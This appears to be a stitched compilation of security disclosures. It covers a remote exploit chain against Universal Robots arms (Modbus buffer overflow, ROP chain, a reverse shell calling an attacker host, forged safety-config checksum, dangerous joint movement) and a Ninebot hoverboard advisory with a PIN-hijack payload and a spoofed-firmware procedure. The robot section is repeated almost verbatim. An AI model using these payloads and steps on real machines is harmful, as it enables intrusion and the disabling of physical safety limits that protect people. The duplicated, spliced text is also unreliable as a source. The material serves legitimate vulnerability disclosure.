Step 3. Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4. Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5. Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6. Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.
By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.
Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
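A version probe along these lines can be sketched in Python. The Dashboard Server port (29999) and the exact command are assumptions based on public UR documentation, not details taken from the exploit, and the banner format is hypothetical:

```python
import re
import socket

def parse_ursys_version(banner: str):
    """Extract a (major, minor, patch) tuple from a version banner
    such as 'URControl 3.3.4-310' (hypothetical format)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def query_version(host: str, port: int = 29999) -> str:
    """Ask the (unauthenticated) Dashboard Server for its version string.
    The command name is an assumption - consult the protocol docs."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(4096)                       # discard the welcome banner
        s.sendall(b"PolyscopeVersion\n")
        return s.recv(4096).decode(errors="replace")

VULNERABLE = (3, 3, 4)                     # image version targeted by the exploit
```

Because the service performs no authentication, any host with network reachability can fingerprint the robot this way.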
Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5, or UR10), I exploit a network service to compromise the robot (Step 2).

The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could put the robot into a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.

It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary). The stack buffer overflows in the recv function, because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.
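To illustrate the shape of such a request (without real offsets or a working trigger), a Modbus/TCP frame with an attacker-chosen, oversized payload can be built like this; the PDU contents are placeholders:

```python
import struct

def modbus_frame(payload: bytes, transaction_id: int = 1, unit_id: int = 0) -> bytes:
    """Build a Modbus/TCP frame: MBAP header (transaction id, protocol id = 0,
    length, unit id) followed by the PDU payload."""
    length = len(payload) + 1            # unit id + PDU, per the MBAP spec
    return struct.pack(">HHHB", transaction_id, 0, length, unit_id) + payload

# Hypothetical trigger: a PDU far larger than the receiver's stack buffer.
# Real exploitation requires the exact buffer size and offsets from the binary.
oversized = modbus_frame(b"\x10" + b"A" * 0x1000)
```

A well-formed Modbus stack would reject a declared length beyond the protocol maximum; the vulnerable receiver instead trusts it when sizing the copy.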
Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.
While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.
edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.
To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.
I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
● 0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
● 0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
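A search script along those lines might look like the following sketch; the base address, the pointer-validity range, and the synthetic dump handling are assumptions for illustration:

```python
import struct

# Assumed base of the dumped static data region (illustrative value).
BASE = 0x8300000

def points_to_valid(ptr: int, lo: int, hi: int) -> bool:
    """A pointer is acceptable if it lands inside the mapped static region."""
    return lo <= ptr < hi

def find_candidates(dump: bytes, lo: int, hi: int):
    """Scan a raw dump for addresses satisfying both exploit conditions:
    *(addr+0x2c) is a valid pointer and *(addr+0x1014) is zero."""
    hits = []
    for off in range(0, len(dump) - 0x1018, 4):
        ptr = struct.unpack_from("<I", dump, off + 0x2c)[0]
        if points_to_valid(ptr, lo, hi) and dump[off + 0x1014:off + 0x1018] == b"\x00" * 4:
            hits.append(BASE + off)
    return hits
```

Any hit from such a scan is ASLR-stable, since the static region it scans does not move between executions.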
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:
At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used return-oriented programming (ROP); the challenge is to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.

First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux is system calls. Depending on the quality of the gadgets that use int instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell, or other post-exploitation strategies.

In this binary, I only found one int 0x80 instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX, in this case 0xb) and another register (EBX) that points to a special structure. This structure contains an array of pointers, each of which points to an argument of the command to be executed.

Because of how this vulnerability is triggered, I cannot use null bytes (0x00) in the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that ends with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00 at runtime with ROP.

In pseudocode this call would be (calls a TCP Reverse Shell):
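The placeholder trick can be sketched in Python: 0xFF bytes stand in for the forbidden 0x00 bytes in the request, and the ROP chain later rewrites them in place. The command below is a generic reverse-shell example with a hypothetical IP and port, not the exact payload used:

```python
# 0xFF bytes stand in for the 0x00 bytes the request buffer cannot contain;
# the ROP chain overwrites each placeholder with a real NUL at runtime.
cmd = [b"/bin/bash", b"-c",
       b"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"]   # hypothetical reverse shell

payload = b"\xff".join(cmd) + b"\xff"          # placeholder-terminated strings
patched = payload.replace(b"\xff", b"\x00")    # what the ROP writes in memory

# After patching, each argument is a proper NUL-terminated C string,
# ready to be referenced by the execve pointer array.
args = patched.split(b"\x00")[:3]
```

The same substitution applies to the pointer array itself: its terminating NULL entry is sent as 0xFF bytes and zeroed by the chain before execve runs.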
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets.
As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
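The wrap-around arithmetic can be checked with a few lines of Python (the ESP value below is hypothetical):

```python
# 32-bit wrap-around: adding 0xfffffec9 to ESP is the same as subtracting 0x137.
MASK = 0xFFFFFFFF
EBX = 0xFFFFFEC9

def adjust_esp(esp: int, ebx: int) -> int:
    # The gadget computes ESP = ESP + EBX - 1 (modulo 2**32).
    return (esp + ebx - 1) & MASK

esp = 0xBFFFF200                    # hypothetical stack pointer value
assert adjust_esp(esp, EBX) == esp - 0x137 - 1
```

Since the addition is performed modulo 2^32, the large unsigned constant acts as a negative offset and lands ESP exactly on the STAGE 1 buffer.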
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
Zero out the \xff\xff\xff\xff at the end of the arguments structure. This way the processor will know that the EXECVE arguments are only those three pointers.
Save a pointer to our first command of cmd[] in our arguments structure.
Jump to STAGE 2, because I don’t have much space here.
STAGE 2 of the exploit does the following:
Zero out the \xff\xff\xff\xff at the end of each argument in cmd[].
Save a pointer to the 2nd and 3rd arguments of cmd[] in our arguments structure.
Prepare the registers for EXECVE. As seen before, we need:
EBX = *args[]
EDX = 0
EAX = 0xb
Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings by overriding special files on the filesystem. I reversed how this calculation is made for each safety setting and created an algorithm that replicates it. In the video demo, I did not fake the new CRC value to keep it the same (located at the top-right of the screen), even though this is possible and easy (Step 4).
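As a sketch of what such a replicated checksum looks like: the STM32 CRC peripheral is commonly described as the CRC-32/MPEG-2 variant (polynomial 0x04C11DB7, initial value 0xFFFFFFFF, no bit reflection, no final XOR). Whether the robot feeds it bytes or packed 32-bit words is an assumption here; a byte-wise software version is:

```python
def crc32_mpeg2(data: bytes) -> int:
    """Byte-wise CRC-32/MPEG-2: poly 0x04C11DB7, init 0xFFFFFFFF,
    no reflection, no final XOR (the variant the STM32 CRC unit is
    usually documented as implementing)."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte << 24
        for _ in range(8):
            if crc & 0x80000000:
                crc = ((crc << 1) ^ 0x04C11DB7) & 0xFFFFFFFF
            else:
                crc = (crc << 1) & 0xFFFFFFFF
    return crc
```

Because the checksum is a plain CRC with no secret key, anyone who can write safety.conf can also compute (or collide) a matching value, which is why it provides no real integrity.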
Before modifying any safety setting on the robot, I set up a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This gives me enough time to download, modify, and upload a new safety settings file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors, so they are closed when the parent URControl process dies (in order to restart and apply the new safety settings).
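A minimal sketch of that idea, with a generic command in place of the real URControl invocation (the helper name and wrapper are illustrative, not the exploit's exact code):

```python
import subprocess
import sys

def respawn_later(cmd, delay=25):
    """Launch `cmd` after `delay` seconds in a fully detached process:
    close_fds drops every inherited descriptor (so the dying parent's
    sockets are not held open) and start_new_session detaches the child
    from the parent's process group."""
    wrapper = [sys.executable, "-c",
               "import time,subprocess,sys; time.sleep(float(sys.argv[1])); "
               "subprocess.call(sys.argv[2:])",
               str(delay)] + list(cmd)
    return subprocess.Popen(wrapper, close_fds=True, start_new_session=True)
```

The 25-second window is the race: the detached child sleeps while the attacker swaps safety.conf and kills the old URControl instance, then it starts the controller fresh with the new settings.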
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
Then, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.
Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.
Safety Scanner 13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide
Changing Safety Configurations Remotely
“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
The exploitation process to remotely change the safety configuration is as follows:
Step 1.Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server. Step 2.Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root. Step 3.Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values. Step 4.Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice. Step 5.Restart the robot so the safety configurations are updated by the new file. This should be done silently. Step 6.Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.
By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.
Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recvfunction,because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.
Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.
While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.
edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.
To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.
I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
●0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
●0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:
At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.
First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls. Depending on the quality of gadgets that use int instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.
In this binary, I found only one int 0x80 instruction, which is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can perform only a single system call: I will use the execve system call to execute a program. The int 0x80 instruction requires setting up one register with the system call number (EAX, in this case 0xb for execve) and another register (EBX) pointing to a special structure. This structure contains an array of pointers, each of which points to one of the arguments of the command to be executed.
Because of how this vulnerability is triggered, I cannot use null bytes (0x00) in the request buffer. This is a problem, because we need to send commands and arguments, as well as an array of pointers that ends with a null pointer. To overcome this, I send placeholders, such as chunks of 0xFF bytes, and later replace them with 0x00 at runtime with ROP.
In pseudocode, this call (a TCP reverse shell) would be:
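In Python terms, the staged call is equivalent to the following. The attacker IP/port and the shell path are placeholders, not values taken from the exploit:

```python
# Equivalent of the staged execve(): three argument pointers followed by a
# NULL terminator. ATTACKER_IP and the port are placeholders.
cmd = ["/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"]
# The ROP chain ultimately performs: execve(cmd[0], cmd, NULL)
# (in Python: os.execve(cmd[0], cmd, {}))
```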
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets.
As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
This way, ESP = ESP + EBX – 1 (the STAGE 1 address on the stack), which aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the value 0xfffffec9 (4294966985): when added to ESP, it wraps around to the desired address.
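The wrap-around arithmetic can be checked directly; adding 0xfffffec9 modulo 2^32 is the same as subtracting 0x137, so no null bytes are needed in the request:

```python
# 32-bit wrap-around: 0xfffffec9 == 2**32 - 0x137, so adding it is the same
# as subtracting 0x137 modulo 2**32. The gadget computes ESP = ESP + EBX - 1.
MASK = 0xFFFFFFFF
EBX = 0xfffffec9   # value placed in EBX before the pivot gadget runs

def adjusted_esp(esp):
    return (esp + EBX - 1) & MASK   # net shift: -0x137 from EBX, -1 from the gadget
```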
When the retn instruction of the gadget executes, the ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
Zero out the 0xFF placeholder at the end of the arguments structure. This way, the kernel knows that the execve arguments are only those three pointers.
Save a pointer to our first command of cmd[] in our arguments structure.
Jump to STAGE 2, because I don’t have much space here.
STAGE 2 of the exploit does the following:
Zero out the 0xff 0xff 0xff 0xff placeholder at the end of each argument in cmd[].
Save pointers to the 2nd and 3rd arguments of cmd[] in our arguments structure.
Prepare the registers for execve. As seen before, we need:
● EBX = *args[]
● EDX = 0
● EAX = 0xb
Call the int 0x80 gadget and execute the reverse shell.
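The register setup of this final stage can be sketched as a packed gadget chain. Only the general shape comes from the write-up; every gadget address below is a placeholder, and immediates containing 0x00 bytes are shown literally for clarity (in the real request they are 0xFF placeholders patched to zero at runtime):

```python
import struct

def dwords(*vals):
    # Pack gadget addresses / immediates as 32-bit little-endian values.
    return b"".join(struct.pack("<I", v & 0xFFFFFFFF) for v in vals)

# Hypothetical gadget addresses, for illustration only.
GADGET_POP_EBX = 0x42424242   # pop ebx ; ret       (placeholder)
GADGET_XOR_EDX = 0x43434343   # xor edx, edx ; ret  (placeholder, avoids a raw 0x00)
GADGET_POP_EAX = 0x45454545   # pop eax ; ret       (placeholder)
GADGET_INT80   = 0x44444444   # int 0x80            (placeholder)
ARGS_STRUCT    = 0x46464646   # address of args[]   (placeholder)

stage2 = dwords(
    GADGET_POP_EBX, ARGS_STRUCT,   # EBX = *args[]
    GADGET_XOR_EDX,                # EDX = 0 (envp = NULL)
    GADGET_POP_EAX, 0xb,           # EAX = 0xb (execve)
    GADGET_INT80,                  # the one-shot int 0x80 fires the reverse shell
)
```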
Once the TCP reverse shell payload executes, a connection is made back to my computer. Now I can execute commands and use sudo to run commands as root on the robot controller.
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM32) algorithm to provide integrity for this file and saves the calculated checksum to disk. This algorithm does not provide any real integrity for the settings, as it is possible to generate collisions or simply compute new checksum values for new settings, overriding special files on the filesystem. I reversed how this calculation is made for each safety setting and created an algorithm that replicates it. In the video demo, I did not fake the new CRC value to keep it the same (shown in the top-right of the screen), even though doing so is possible and easy (Step 4).
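A software replica of an STM32-style CRC can be sketched as below. The STM32 hardware CRC unit uses polynomial 0x04C11DB7 over 32-bit words, seeded with 0xFFFFFFFF, with no reflection and no final XOR; whether Universal Robots’ variant matches this exactly, and how safety.conf is split into words, are assumptions here:

```python
def stm32_crc(words, crc=0xFFFFFFFF, poly=0x04C11DB7):
    # Bitwise model of the STM32 hardware CRC unit: one 32-bit word at a
    # time, MSB-first, no input/output reflection, no final XOR.
    for w in words:
        crc ^= w & 0xFFFFFFFF
        for _ in range(32):
            if crc & 0x80000000:
                crc = ((crc << 1) ^ poly) & 0xFFFFFFFF
            else:
                crc = (crc << 1) & 0xFFFFFFFF
    return crc
```

With a replica like this, a new checksum can be computed for any modified safety.conf, defeating the integrity check.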
Before modifying any safety settings on the robot, I set up a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This gives me enough time to download, modify, and upload a new safety settings file. The following command sets up a new URControl process. I used Python because it allows me to close all of the running process’s current file descriptors when forking. Remember that I am forking from the reverse shell process, so I need to create a new process that does not inherit any of the file descriptors; that way, they are closed when the parent URControl process dies (so it can restart and apply the new safety settings).
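A minimal sketch of that respawn step, assuming a plain fork/exec (the URControl path and exact invocation are placeholders):

```python
import os
import time

def respawn(argv, delay=25):
    # Fork a child that waits out the settings swap, then exec()s a fresh
    # controller. The parent (our reverse shell) returns immediately.
    pid = os.fork()
    if pid:
        return pid
    os.closerange(3, 1024)     # drop inherited descriptors so the dying
                               # URControl's sockets actually close
    time.sleep(delay)          # window to download/patch/re-upload safety.conf
    os.execv(argv[0], argv)    # e.g. ["/root/URControl"] -- path assumed

# respawn(["/root/URControl"])   # as used on the controller (path assumed)
```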
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
Next, I send this command to the URControl service to load the new installation we uploaded. I also close any popup that might appear on the UI.
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.
Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
Multiple Critical Vulnerabilities Found in Popular Motorized Hoverboards
By Thomas Kilbride
Not that long ago, motorized hoverboards were in the news – according to widespread reports, they had a tendency to catch on fire and even explode. Hoverboards were so dangerous that the National Association of State Fire Marshals (NASFM) issued a statement recommending consumers “look for indications of acceptance by recognized testing organizations” when purchasing the devices. Consumers were even advised to not leave them unattended due to the risk of fires. The Federal Trade Commission has since established requirements that any hoverboard imported to the US meet baseline safety requirements set by Underwriters Laboratories.
Since hoverboards were a popular item used for personal transportation, I acquired a Ninebot by Segway miniPRO hoverboard in September of 2016 for recreational use. The technology is amazing and a lot of fun, making it very easy to learn and become a relatively skilled rider.
The hoverboard is also connected and comes with a rider application that lets the owner do some cool things, such as change the light colors, remotely control the hoverboard, and see its battery life and remaining mileage. I was naturally a little intrigued and couldn’t help but start tinkering to see how fragile the firmware was. Given my past experience as a security consultant and the well-chronicled issues above, it seemed clear that if vulnerabilities did exist, they might be exploited by an attacker to cause some serious harm.
When I started looking further, I learned that regulations now require hoverboards to meet certain mechanical and electrical specifications with the goal of preventing battery fires and various mechanical failures; however, there are currently no regulations aimed at ensuring firmware integrity and validation, even though firmware is also integral to the safety of the system.
Let’s Break a Hoverboard
Using reverse engineering and protocol analysis techniques, I was able to determine that my Ninebot by Segway miniPRO (Ninebot purchased Segway Inc. in 2015) had several critical vulnerabilities that were wirelessly exploitable. These vulnerabilities could be used by an attacker to bypass safety systems designed by Ninebot, one of the only hoverboards approved for sale in many countries.
Using protocol analysis, I determined that I didn’t need a rider’s PIN (Personal Identification Number) to establish a connection. Even though the rider could set a PIN, the hoverboard did not actually change its default PIN of “000000.” This allowed me to connect over Bluetooth while bypassing the security controls. I could also document the communications between the app and the hoverboard, since they were not encrypted.
Additionally, after attempting to apply a corrupted firmware update, I noticed that the hoverboard did not implement any integrity checks on firmware images before applying them. This means an attacker could apply any arbitrary update to the hoverboard, which would allow them to bypass safety interlocks.
Upon further investigation of the Ninebot application, I also determined that connected riders in the area were indexed using their smartphones’ GPS; therefore, each rider’s location is published and publicly available, making actual weaponization of an exploit much easier for an attacker.
To show how this works, an attacker using the Ninebot application can locate other hoverboard riders in the vicinity:
An attacker could then connect to the miniPRO using a modified version of the Nordic UART application, the reference implementation of the Bluetooth service used in the Ninebot miniPRO. This application allows anyone to connect to the Ninebot without being asked for a PIN. By sending the following payload from the Nordic application, the attacker can change the application PIN to “111111”:
unsigned char payload[14] =
{0x55, 0xAA, 0x08, 0x0A, 0x03, 0x17, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0xAD, 0xFE}; // Set the hoverboard PIN to “111111”
Figure 1 – miniPRO PIN Theft
Using the PIN “111111,” the attacker can then launch the Ninebot application and connect to the hoverboard. This locks the normal user out of the Ninebot mobile application, because a new PIN has been set.
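The last two bytes of the payload shown earlier (0xAD, 0xFE) are consistent with a simple inverted 16-bit sum over everything after the 0x55 0xAA header, sent little-endian. A sketch assuming that scheme (inferred from the sample payload, not documented by Ninebot) reproduces them:

```python
def ninebot_checksum(body):
    # Assumed scheme: 0xFFFF minus the 16-bit sum of every byte after the
    # 0x55 0xAA header, transmitted little-endian.
    s = (0xFFFF - sum(body)) & 0xFFFF
    return bytes([s & 0xFF, (s >> 8) & 0xFF])

body = bytes([0x08, 0x0A, 0x03, 0x17]) + b"111111"   # set-PIN command + new PIN
payload = bytes([0x55, 0xAA]) + body + ninebot_checksum(body)
```

With the checksum computable, arbitrary commands can be framed and sent over the unauthenticated UART service, not just the PIN change.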
Using DNS spoofing, an attacker can upload an arbitrary firmware image by spoofing the domain record for apptest.ninebot.cn. The mobile application downloads the image and then uploads it to the hoverboard:
On http://apptest.ninebot.cn, change the /appversion/appdownload/NinebotMini/version.json file to match the new firmware version and size. The example below forces the application to update the control/mainboard firmware image (aka driver board firmware) to v1.3.3.7, which is 50212 bytes in size.
"CtrlVersionCode": ["1337", "50212"]
Create a matching directory and file including the malicious firmware (/appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip) with the modified update file Mini_Driver_V1.3.3.7.bin compressed inside of the firmware update archive.
When launched, the Ninebot application checks to see if the firmware version on the hoverboard matches the one downloaded from apptest.ninebot.cn. If there is a later version available (that is, if the version in the JSON object is newer than the version currently installed), the app triggers the firmware update process.
Analysis of Findings
Even though the Ninebot application prompted a user to enter a PIN when launched, it was not checked at the protocol level before allowing the user to connect. This left the Bluetooth interface exposed to an attack at a lower level. Additionally, since this device did not use standard Bluetooth PIN-based security, communications were not encrypted and could be wirelessly intercepted by an attacker.
Exposed management interfaces should not be available on a production device. An attacker may leverage an open management interface to execute privileged actions remotely. Due to the implementation in this scenario, I was able to leverage this vulnerability and perform a firmware update of the hoverboard’s control system without authentication.
Firmware integrity checks are imperative in embedded systems. Unverified or corrupted firmware images could permanently damage systems and may allow an attacker to cause unintended behavior. I was able to modify the controller firmware to remove rider detection, and may have been able to change configuration parameters in other onboard systems, such as the BMS (Battery Management System) and Bluetooth module.
Figure 2 – Unencrypted Communications between
Hoverboard and Android Application
Figure 3 – Interception of Android Application Setting PIN Code to “111111”
Mitigation
As a result of the research, IOActive made the following security design and development recommendations to Ninebot that would correct these vulnerabilities:
Implement firmware integrity checking.
Use Bluetooth Pre-Shared Key authentication or PIN authentication.
Use strong encryption for wireless communications between the application and hoverboard.
Implement a “pairing mode” as the sole mode in which the hoverboard pairs over Bluetooth.
Protect rider privacy by not exposing rider location within the Ninebot mobile application.
IOActive recommends that end users stay up-to-date with the latest versions of the app from Ninebot. We also recommend that consumers avoid hoverboard models with Bluetooth and wireless capabilities.
Responsible Disclosure
After completing the research, IOActive contacted and disclosed the details of the identified vulnerabilities to Ninebot. Through a series of exchanges since the initial contact, Ninebot has released a new version of the application and reported to IOActive that the critical issues have been addressed.
December 2016: IOActive conducts testing on the Ninebot by Segway miniPRO hoverboard.
December 24, 2016: IOActive contacts Ninebot via a public email address to establish a line of communication.
January 4, 2017: Ninebot responds to IOActive.
January 27, 2017: IOActive discloses issues to Ninebot.
April 2017: Ninebot releases an updated application (3.20), which includes fixes that address some of IOActive’s findings.
April 17, 2017: Ninebot informs IOActive that remediation of critical issues is complete.
July 19, 2017: IOActive publishes findings.
For more information about this research, please refer to the following additional materials: